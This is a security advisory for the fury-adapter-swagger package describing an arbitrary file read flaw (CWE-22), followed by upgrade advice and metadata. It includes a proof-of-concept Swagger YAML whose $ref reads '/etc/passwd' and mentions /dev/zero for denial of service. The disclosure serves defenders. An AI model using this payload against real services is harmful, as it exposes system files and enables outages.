fury-adapter-swagger
from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero
.
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Upgrade to version 0.9.7 or later.
{ "nvd_published_at": null, "github_reviewed_at": "2020-08-31T18:18:37Z", "github_reviewed": true, "severity": "HIGH", "cwe_ids": [ "CWE-22" ] }